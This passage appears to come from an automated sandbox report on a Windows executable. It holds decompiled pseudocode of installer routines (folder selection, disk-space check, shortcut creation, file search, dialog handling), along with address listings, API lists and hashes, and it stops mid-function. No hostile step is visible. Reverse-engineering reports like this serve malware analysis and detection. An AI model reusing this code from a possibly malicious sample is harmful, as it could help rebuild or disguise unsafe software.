                                                                                                                    0x00404956
                                                                                                                    0x00404959
                                                                                                                    0x0040495f
                                                                                                                    0x00404960
                                                                                                                    0x00404965
                                                                                                                    0x0040496e
                                                                                                                    0x00404975
                                                                                                                    0x00404978
                                                                                                                    0x0040497b
                                                                                                                    0x0040497e
                                                                                                                    0x004049ba
                                                                                                                    0x004049e3
                                                                                                                    0x004049bc
                                                                                                                    0x004049c9
                                                                                                                    0x004049c9
                                                                                                                    0x00404980
                                                                                                                    0x00404983
                                                                                                                    0x00404992
                                                                                                                    0x0040499c
                                                                                                                    0x004049a4
                                                                                                                    0x004049ab
                                                                                                                    0x004049b3
                                                                                                                    0x004049b3
                                                                                                                    0x0040497e
                                                                                                                    0x004049e9
                                                                                                                    0x004049ea
                                                                                                                    0x004049f6
                                                                                                                    0x004049f6
                                                                                                                    0x00404a03
                                                                                                                    0x00404a1e
                                                                                                                    0x00404a22
                                                                                                                    0x00404a3f
                                                                                                                    0x00404a44
                                                                                                                    0x00404a47
                                                                                                                    0x00000000
                                                                                                                    0x00404a24
                                                                                                                    0x00404a29
                                                                                                                    0x00404a32
                                                                                                                    0x00404dbf
                                                                                                                    0x00404dd1
                                                                                                                    0x00404dd1
                                                                                                                    0x00404a22
                                                                                                                    0x00000000
                                                                                                                    0x00404a03
                                                                                                                    0x0040493b

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                    • String ID: $M$N
                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                    • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                                                                    • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                                                                                    • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                                                                    • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42371c + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t125 =  *((intOrPtr*)( *0x423f50 + 0x11c));
								if( *((intOrPtr*)( *0x423f50 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}












































                                                                                                                    0x00404292
                                                                                                                    0x00404298
                                                                                                                    0x0040429e
                                                                                                                    0x004042ab
                                                                                                                    0x004042b9
                                                                                                                    0x004042bc
                                                                                                                    0x004042c4
                                                                                                                    0x004042ca
                                                                                                                    0x004042ca
                                                                                                                    0x004042d6
                                                                                                                    0x004042d9
                                                                                                                    0x00404347
                                                                                                                    0x0040434e
                                                                                                                    0x00404425
                                                                                                                    0x0040442c
                                                                                                                    0x0040443b
                                                                                                                    0x0040443b
                                                                                                                    0x0040443f
                                                                                                                    0x00404449
                                                                                                                    0x00404456
                                                                                                                    0x00404458
                                                                                                                    0x00404458
                                                                                                                    0x00404466
                                                                                                                    0x0040446d
                                                                                                                    0x00404474
                                                                                                                    0x00404477
                                                                                                                    0x004044ae
                                                                                                                    0x004044b0
                                                                                                                    0x004044b6
                                                                                                                    0x004044bb
                                                                                                                    0x004044bf
                                                                                                                    0x004044c1
                                                                                                                    0x004044c1
                                                                                                                    0x004044dd
                                                                                                                    0x00000000
                                                                                                                    0x004044df
                                                                                                                    0x004044e2
                                                                                                                    0x004044f0
                                                                                                                    0x004044f6
                                                                                                                    0x004044f7
                                                                                                                    0x004044fa
                                                                                                                    0x004044fd
                                                                                                                    0x00000000
                                                                                                                    0x004044fd
                                                                                                                    0x00404479
                                                                                                                    0x0040447b
                                                                                                                    0x0040447f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404481
                                                                                                                    0x00404481
                                                                                                                    0x0040448e
                                                                                                                    0x00404493
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404497
                                                                                                                    0x00404499
                                                                                                                    0x00404499
                                                                                                                    0x004044a4
                                                                                                                    0x004044a7
                                                                                                                    0x004044ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004044ac
                                                                                                                    0x00404509
                                                                                                                    0x00404513
                                                                                                                    0x00404516
                                                                                                                    0x00404519
                                                                                                                    0x00404520
                                                                                                                    0x00404520
                                                                                                                    0x00404522
                                                                                                                    0x00404522
                                                                                                                    0x00404527
                                                                                                                    0x00404529
                                                                                                                    0x00404531
                                                                                                                    0x00404538
                                                                                                                    0x0040453a
                                                                                                                    0x00404545
                                                                                                                    0x00404545
                                                                                                                    0x0040453a
                                                                                                                    0x00404555
                                                                                                                    0x0040455f
                                                                                                                    0x00404567
                                                                                                                    0x00404582
                                                                                                                    0x00404569
                                                                                                                    0x00404572
                                                                                                                    0x00404572
                                                                                                                    0x00404567
                                                                                                                    0x00404587
                                                                                                                    0x0040458c
                                                                                                                    0x00404591
                                                                                                                    0x0040459a
                                                                                                                    0x0040459a
                                                                                                                    0x004045a3
                                                                                                                    0x004045a5
                                                                                                                    0x004045a5
                                                                                                                    0x004045b1
                                                                                                                    0x004045b9
                                                                                                                    0x004045c3
                                                                                                                    0x004045c3
                                                                                                                    0x004045c8
                                                                                                                    0x00000000
                                                                                                                    0x004045c8
                                                                                                                    0x00404477
                                                                                                                    0x0040442e
                                                                                                                    0x00404435
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404435
                                                                                                                    0x00404354
                                                                                                                    0x0040435d
                                                                                                                    0x00404377
                                                                                                                    0x0040437c
                                                                                                                    0x00404386
                                                                                                                    0x0040438d
                                                                                                                    0x00404399
                                                                                                                    0x0040439c
                                                                                                                    0x0040439f
                                                                                                                    0x004043a6
                                                                                                                    0x004043ae
                                                                                                                    0x004043b1
                                                                                                                    0x004043b5
                                                                                                                    0x004043bc
                                                                                                                    0x004043c4
                                                                                                                    0x0040441e
                                                                                                                    0x004043c6
                                                                                                                    0x004043c7
                                                                                                                    0x004043ce
                                                                                                                    0x004043d8
                                                                                                                    0x004043e0
                                                                                                                    0x004043ed
                                                                                                                    0x00404401
                                                                                                                    0x00404405
                                                                                                                    0x00404405
                                                                                                                    0x00404401
                                                                                                                    0x0040440a
                                                                                                                    0x00404417
                                                                                                                    0x00404417
                                                                                                                    0x004043c4
                                                                                                                    0x00000000
                                                                                                                    0x0040437c
                                                                                                                    0x0040436a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404370
                                                                                                                    0x00000000
                                                                                                                    0x004042db
                                                                                                                    0x004042e8
                                                                                                                    0x004042f1
                                                                                                                    0x004042fe
                                                                                                                    0x004042fe
                                                                                                                    0x00404305
                                                                                                                    0x0040430b
                                                                                                                    0x00404314
                                                                                                                    0x00404317
                                                                                                                    0x0040431a
                                                                                                                    0x00404322
                                                                                                                    0x00404325
                                                                                                                    0x00404328
                                                                                                                    0x0040432e
                                                                                                                    0x00404335
                                                                                                                    0x0040433c
                                                                                                                    0x004045ce
                                                                                                                    0x004045e0
                                                                                                                    0x00404342
                                                                                                                    0x00404345
                                                                                                                    0x00000000
                                                                                                                    0x00404345
                                                                                                                    0x0040433c

                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32 ref: 004042E1
                                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                                                                                    • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                                                                                    • lstrcmpiA.KERNEL32(Call,00420538,00000000,?,?), ref: 004043F9
                                                                                                                    • lstrcatA.KERNEL32(?,Call), ref: 00404405
                                                                                                                    • SetDlgItemTextA.USER32 ref: 00404417
                                                                                                                      • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                                                                                      • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                      • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                      • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                      • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                                                                                                      • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                      • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                                                                                      • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                    • API String ID: 2624150263-2175137099
                                                                                                                    • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                                                                    • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                                                                                    • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                                                                    • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 74%
                                                                                                                    			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                                    0x0040205c
                                                                                                                    0x00402066
                                                                                                                    0x0040206f
                                                                                                                    0x00402079
                                                                                                                    0x00402082
                                                                                                                    0x0040208c
                                                                                                                    0x00402090
                                                                                                                    0x00402090
                                                                                                                    0x00402095
                                                                                                                    0x004020a6
                                                                                                                    0x004020ae
                                                                                                                    0x0040218e
                                                                                                                    0x0040218e
                                                                                                                    0x00402195
                                                                                                                    0x004020b4
                                                                                                                    0x004020b4
                                                                                                                    0x004020c5
                                                                                                                    0x004020c9
                                                                                                                    0x004020cf
                                                                                                                    0x004020d9
                                                                                                                    0x004020db
                                                                                                                    0x004020e6
                                                                                                                    0x004020e9
                                                                                                                    0x004020f6
                                                                                                                    0x004020f8
                                                                                                                    0x004020fa
                                                                                                                    0x00402101
                                                                                                                    0x00402104
                                                                                                                    0x00402104
                                                                                                                    0x00402107
                                                                                                                    0x00402111
                                                                                                                    0x00402119
                                                                                                                    0x0040211e
                                                                                                                    0x0040212a
                                                                                                                    0x0040212a
                                                                                                                    0x0040212d
                                                                                                                    0x00402136
                                                                                                                    0x00402139
                                                                                                                    0x00402142
                                                                                                                    0x00402147
                                                                                                                    0x00402159
                                                                                                                    0x00402168
                                                                                                                    0x0040216a
                                                                                                                    0x00402176
                                                                                                                    0x00402176
                                                                                                                    0x00402168
                                                                                                                    0x00402178
                                                                                                                    0x0040217e
                                                                                                                    0x0040217e
                                                                                                                    0x00402181
                                                                                                                    0x00402187
                                                                                                                    0x0040218c
                                                                                                                    0x004021a1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040218c
                                                                                                                    0x00402197
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                    • API String ID: 123533781-1943935188
                                                                                                                    • Opcode ID: be968ece18af4a8990e49a46ffb91ad691b7d30926a5843cb181693629e4be0f
                                                                                                                    • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                                                                                    • Opcode Fuzzy Hash: be968ece18af4a8990e49a46ffb91ad691b7d30926a5843cb181693629e4be0f
                                                                                                                    • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 39%
                                                                                                                    			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                    0x00402689
                                                                                                                    0x0040269d
                                                                                                                    0x004026a8
                                                                                                                    0x004026a9
                                                                                                                    0x004027e4
                                                                                                                    0x0040268b
                                                                                                                    0x0040268b
                                                                                                                    0x0040268d
                                                                                                                    0x0040268f
                                                                                                                    0x0040268f
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1974802433-0
                                                                                                                    • Opcode ID: 335f766a02d87fc4f144a72dfe7bfeb47f84df3e5a293ec2139a669d47195b1b
                                                                                                                    • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                                                                                    • Opcode Fuzzy Hash: 335f766a02d87fc4f144a72dfe7bfeb47f84df3e5a293ec2139a669d47195b1b
                                                                                                                    • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403981, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728);
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64;
							if(_t39 ==  *0x423f64) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133;
							if( *0x42370c != _t133) {
								break;
							}
							__eflags =  *0x4091ac -  *0x423f64; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
